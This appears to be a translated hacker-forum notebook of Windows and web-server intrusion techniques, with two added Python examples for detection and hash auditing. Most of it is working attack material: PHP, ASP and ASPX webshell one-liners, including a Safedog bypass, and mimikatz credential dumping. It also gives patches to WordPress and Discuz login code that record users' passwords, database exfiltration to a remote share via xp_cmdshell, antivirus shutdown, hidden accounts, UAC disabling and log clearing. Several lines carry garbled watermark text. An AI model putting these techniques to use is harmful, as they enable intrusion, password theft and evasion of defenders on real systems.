echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
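The account-creation and privilege-grant sequence above (net user ... /add, net localgroup Administrators ... /add), the sc create SuperCMD service shell earlier on the page, and the shells spawned from sqlservr.exe or mysqld.exe by the sp_oacreate and INTO OUTFILE tricks each leave Windows events (4688, 4720, 4732, 7045). The following is an added example, not code from the original post, that correlates such events: a new account placed in an administrative group within a short window, a service whose image path is a command shell, and a database or web server process spawning a shell. The event records are constructed dictionaries carrying the field names those events use; MemberName is a plain account name here rather than the SID a real 4732 carries.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)          # account created -> granted admin inside this window
ADMIN_GROUPS = {"administrators", "remote desktop users"}
SHELLS = {"cmd", "cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
ADMIN_TOOLS = SHELLS | {"net.exe", "net1.exe", "reg.exe", "sc.exe"}
SERVER_PARENTS = {"sqlservr.exe", "mysqld.exe", "postgres.exe", "w3wp.exe", "inetinfo.exe"}

# Constructed event records (not a real log); keys follow the fields of events
# 4688 (process created), 4720 (account created), 4732 (member added to a
# local group) and 7045 (service installed).
EVENTS = [
    {"time": "2011-07-17 09:00:01", "id": 4688,
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "NewProcessName": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "cmd.exe /c net user aptime ******** /add"},
    {"time": "2011-07-17 09:00:02", "id": 4720, "TargetUserName": "aptime", "SubjectUserName": "SQLSERVERSVC"},
    {"time": "2011-07-17 09:00:05", "id": 4732, "MemberName": "aptime", "TargetUserName": "Administrators"},
    {"time": "2011-07-17 09:30:00", "id": 7045, "ServiceName": "SuperCMD", "ImagePath": "cmd /K start"},
    {"time": "2011-07-17 10:15:00", "id": 4720, "TargetUserName": "jsmith", "SubjectUserName": "helpdesk"},
    {"time": "2011-07-17 11:00:00", "id": 4688,
     "ParentProcessName": r"C:\WINDOWS\explorer.exe",
     "NewProcessName": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": "cmd.exe"},
    {"time": "2011-07-17 12:00:00", "id": 7045, "ServiceName": "BackupAgent",
     "ImagePath": r'"C:\Program Files\Acme\BackupAgent.exe" /svc'},
    {"time": "2011-07-17 13:40:00", "id": 4732, "MemberName": "jsmith", "TargetUserName": "Remote Desktop Users"},
]


def image_basename(path: str) -> str:
    """Executable name from a service ImagePath or process path: strips quotes, arguments and directory."""
    p = path.strip()
    if p.startswith('"') and '"' in p[1:]:
        exe = p[1:p.index('"', 1)]                      # quoted path, arguments follow the closing quote
    else:
        m = re.match(r"(.*?\.exe)(\s|$)", p, re.I)       # unquoted path that may contain spaces
        exe = m.group(1) if m else p.split()[0]          # bare command such as 'cmd /K start'
    return exe.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return (rule, time, detail) findings in time order."""
    findings, created = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        if ev["id"] == 4720:
            created[ev["TargetUserName"].lower()] = t
        elif ev["id"] == 4732 and ev["TargetUserName"].lower() in ADMIN_GROUPS:
            member = ev["MemberName"].lower()
            if member in created and t - created[member] <= WINDOW:
                findings.append(("new_account_granted_admin", ev["time"],
                                 f"{ev['MemberName']} added to {ev['TargetUserName']}"))
        elif ev["id"] == 7045 and image_basename(ev["ImagePath"]) in SHELLS:
            findings.append(("service_runs_shell", ev["time"],
                             f"{ev['ServiceName']}: {ev['ImagePath']}"))
        elif ev["id"] == 4688:
            parent = image_basename(ev["ParentProcessName"])
            child = image_basename(ev["NewProcessName"])
            if parent in SERVER_PARENTS and child in ADMIN_TOOLS:
                findings.append(("server_spawned_shell", ev["time"],
                                 f"{parent} -> {ev['CommandLine']}"))
    return findings


if __name__ == "__main__":
    for rule, when, detail in correlate(EVENTS):
        print(f"{when}  {rule:26s} {detail}")
```

The jsmith account is created and granted Remote Desktop access more than three hours apart, so it falls outside WINDOW and is not reported.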
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2   view users' passwords
Export an Access database directly as a shell; the prerequisites are that table a exists in Access and that you know the site's real path:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection and you cannot write out through a reverse channel, most people read the records back one at a time, which is exhausting; the STUFF(... FOR XML PATH('')) statements in Test 1 and Test 2 above read all the data out in a single statement.
How to shut down McAfee: // needs SYSTEM privileges, use at or psexec -s cmd.exe
You can upload files of .com type, e.g. nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump; it can also be read by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from a DOS prompt.
. P1 c: K0 }$ `% z. H; oexec master..xp_cmdshell 'net user'" o& R" A: K8 k9 z
mssql执行命令。. p5 ?8 d5 c; W z
获取mssql的密码hash查询/ b5 G/ B/ ?0 F# k# l/ }4 n( c) M
select name,password from master.dbo.sysxlogins
* B* l% Q3 X: _/ O- |
/ ^. P& t1 F0 ^* g- z( M$ f/ \backup log dbName with NO_LOG;; r v( V: f+ g6 v: A& C; Z3 G; U
backup log dbName with TRUNCATE_ONLY;: H9 w; u; m+ L8 Z/ m- d6 U2 q
DBCC SHRINKDATABASE(dbName);
8 L. r1 {6 p% @9 I3 Y- i6 Kmssql数据库压缩
- U, g/ ~. M% U, x3 N' d% w4 L) Z4 o2 `) i
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. R6 P0 w% M4 s" h) s% n! e
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
, |$ c9 X. o. i% q. H+ \
* R7 v1 Z% Y+ g1 b+ Ebackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
/ B ^% b% R" G' S _备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak. {- V% w6 T5 Z* y) k- y! [
Key points for penetrating Discuz!NT 3.5:
(1) Visit site-address/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor is then at http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compress website
Note the path of rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP: a one-liner trojan inserted through a value that was not filtered
Dumping the database when the web and database servers are separated
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
The constraints did not allow writing a full shell, only a one-liner, which is actually enough to do anything, just not intuitive or convenient, e.g. for dumping the database.
What is used here is the shell client's expert mode (writing your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file for every 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect operating system fingerprints
Scan all ports of 192.168.1.100
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identify the name servers, get DNS information
host -l www.owasp.org ns1.secure.net    try requesting a zone transfer for owasp.org
Netcraft's DNS search service, at http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still private)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
When importing the database the error "Data too long for column 'username' at row 1" appears. The cause is that the character set does not support Chinese.
MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans were found during intrusions. They are recorded here so they can be searched for and removed by keyword later.
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: any file is compiled and executed as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// rename any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// caidao one-liner

5. include ($uid);
// dangerous include: any file is compiled and executed as PHP, via POST

// one-liner embedded in a gif

6. Typical one-liners
Backdoor code
<?php eval_r($_POST[sb])?>
Code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code
<?php assert($_POST[sb]);?>
// use the expert mode of lanker's one-liner client to execute the PHP statements
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, when configuring the connection in the caidao one-liner client, enter the following in the "config" field
Code
<O>h=@eval_r($_POST[c]);</O>
Code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a filter on <?
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Type exit to quit; do not close the window directly, otherwise the system will crash.

http://www.monyer.com/demo/monyerjs/ fairly comprehensive JS decoding site

Automatically check for high-risk system patches
! f* {* X0 c& C! l* Gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
One-liner ASPX backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell to support further social engineering
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The password-logging code is triggered when action=login; of course you can also put it in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly underneath; the recorded passwords end up in pwd.txt.
Actually, modifying wp-login.php is not a good approach: it is easily discovered. There are other methods; noting this for the record.
Bypassing Safedog with the IIS 6 file-parsing vulnerability:
;antian365.asp;antian365.jpg
Grabbing hashes from various types of databases to crack the highest-privilege passwords!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins
MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+
*mysql >=4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
usename  | passwd
---------+------------------------------------
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored....

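The hash layouts described above, as an added example (my own code, not from the post): a parser that splits SQL Server hashes into header, salt and digest(s) and classifies MySQL and PostgreSQL hashes, so that an audit of a logins table can flag legacy layouts such as the SQL Server 2000 upper-case digest or the pre-4.1 MySQL PASSWORD() form. Handling of the 0x0200 header (SQL Server 2012+, SHA-512) is my extension beyond the page; the sample rows are constructed from the hashes quoted above.

```python
import re

SHA1_HEX = 40
# header -> (digest algorithm, digest length in hex chars). 0x0100 is the
# layout in the notes above; 0x0200 (SQL Server 2012+, SHA-512) is my addition.
MSSQL_HEADERS = {"0100": ("SHA-1", SHA1_HEX), "0200": ("SHA-512", 128)}


def parse_mssql_hash(value: str) -> dict:
    """Split a SQL Server password hash: header | 4-byte salt | digest(s).

    A trailing second digest (SQL Server 2000 only) is the hash of the
    upper-cased password, which is what makes that layout cheap to attack.
    """
    hexstr = value[2:] if value.lower().startswith("0x") else value
    if not re.fullmatch(r"[0-9A-Fa-f]+", hexstr or ""):
        raise ValueError("not a hex string")
    header, salt, digests = hexstr[:4], hexstr[4:12], hexstr[12:].upper()
    if header not in MSSQL_HEADERS:
        raise ValueError("unknown header 0x%s" % header)
    algo, dlen = MSSQL_HEADERS[header]
    if len(digests) == dlen:
        version, upper = ("2005/2008" if header == "0100" else "2012+"), None
    elif header == "0100" and len(digests) == 2 * dlen:
        version, upper = "2000", digests[dlen:]
    else:
        raise ValueError("unexpected digest length %d" % len(digests))
    return {"scheme": "mssql %s %s" % (version, algo), "salt": salt.upper(),
            "case_sensitive": digests[:dlen], "upper_case": upper,
            "weak": upper is not None}


def classify(db: str, value: str) -> dict:
    """Identify the hash scheme of one stored credential and flag legacy forms."""
    if db == "mssql":
        return parse_mssql_hash(value)
    if db == "mysql" and re.fullmatch(r"\*[0-9A-Fa-f]{40}", value):
        return {"scheme": "mysql 4.1+ SHA1(SHA1(pw))", "weak": False}
    if db == "mysql" and re.fullmatch(r"[0-9A-Fa-f]{16}", value):
        return {"scheme": "mysql pre-4.1 PASSWORD()", "weak": True}
    if db == "postgres" and re.fullmatch(r"md5[0-9a-f]{32}", value):
        # md5(password + username): the username is the only salt
        return {"scheme": "postgres md5(pw + username)", "weak": True}
    return {"scheme": "unknown", "weak": None}


def weak_logins(rows) -> list:
    """Return the login names whose stored hash uses a legacy layout."""
    return [name for db, name, value in rows if classify(db, value)["weak"]]


# Constructed rows built from the sample hashes quoted in the notes above.
SAMPLE_ROWS = [
    ("mssql", "sa@sql2000", "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
                            "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A"),
    ("mssql", "sa@sql2005", "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"),
    ("mysql", "old_user", "6f8c114b58f2ce9e"),
    ("mysql", "new_user", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("postgres", "testuser", "md5fabb6d7172aadfda4753bf0507ed4396"),
]

if __name__ == "__main__":
    for db, name, value in SAMPLE_ROWS:
        print(db, name, classify(db, value))
    print("legacy hashes:", weak_logins(SAMPLE_ROWS))
```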
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51
Changing file permissions on Windows 2008
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First look in the right-click menu for "管理员取得所有权" (Take ownership as administrator); if it is not there,

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import this .reg file to get the Win7 right-click "Take ownership as administrator" entry
II. Search for "notepad.exe" under the C:\Windows directory; you should find four "notepad.exe" and four "notepad.exe.mui",
1. The "notepad.exe" at C:\Windows does not need to be replaced
2. The "notepad.exe" at C:\Windows\System32 does not need to be replaced
3. Leave the four "notepad.exe.mui" alone
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
after replacing, go back to the desktop, create a new txt document and open it to see whether it has changed.
Turning off the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: after
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; the password is: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);